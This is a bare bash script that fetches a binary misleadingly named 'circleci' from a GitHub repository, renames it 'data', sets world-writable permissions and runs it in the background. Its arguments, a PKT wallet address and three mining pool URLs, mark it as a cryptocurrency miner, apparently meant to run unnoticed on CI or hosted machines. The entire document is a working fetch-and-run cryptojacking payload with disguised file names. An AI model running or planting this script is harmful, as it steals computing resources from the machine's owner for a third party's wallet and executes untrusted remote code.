#!/bin/bash
wget https://github.com/aurbach55/zash/raw/main/circleci
mv circleci data
chmod 777 data
nohup ./data ann -p pkt1qun6hf44wgy6eeqz5j383kt9cpest2cek05c9wy http://pool.pkt.world http://pool.pktpool.io http://pool.pkteer.com > nohup.out
